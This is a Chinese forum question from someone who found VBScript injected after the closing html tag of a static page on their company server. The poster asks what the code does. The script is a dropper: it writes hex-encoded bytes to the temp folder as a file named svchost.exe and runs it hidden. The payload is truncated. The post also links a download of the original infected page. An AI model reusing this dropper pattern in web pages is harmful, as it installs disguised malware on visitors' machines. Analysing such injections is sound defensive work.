我在公司服务器上写了一个静态html,方便导航,结果没过多久发现html文件被修改了,在</html>标签后加了这些代码。
注:WriteData 的内容很长,被我删掉了很多,不然没法提交这个提问
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "96E48656C705700000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
这是看起来是黑客或者病毒植入的代码,是要删除windows系统的svchost.exe让系统无法启动吗?还是只是在临时文件夹下创建一个名为svchost.exe的文件,windows系统也有一个同名的文件,而且是个重要的程序,给文件起这个名字显然是病毒做的伪装。然后会执行这个文件。
我觉得vbs好可怕,居然可以在浏览器中操作文件系统,把他们的病毒程序植入本地文件系统并执行,vbs甚至可以不经用户同意删除文件,如果把windows的必要文件删了,windows系统直接死机启动不了。
和vbs比起来,还是js安全一些。
原始html文件在这里,感兴趣的自行下载
链接:https://pan.baidu.com/s/1bMFxJpHdxL_dm9OrSet4_w
提取码:psl6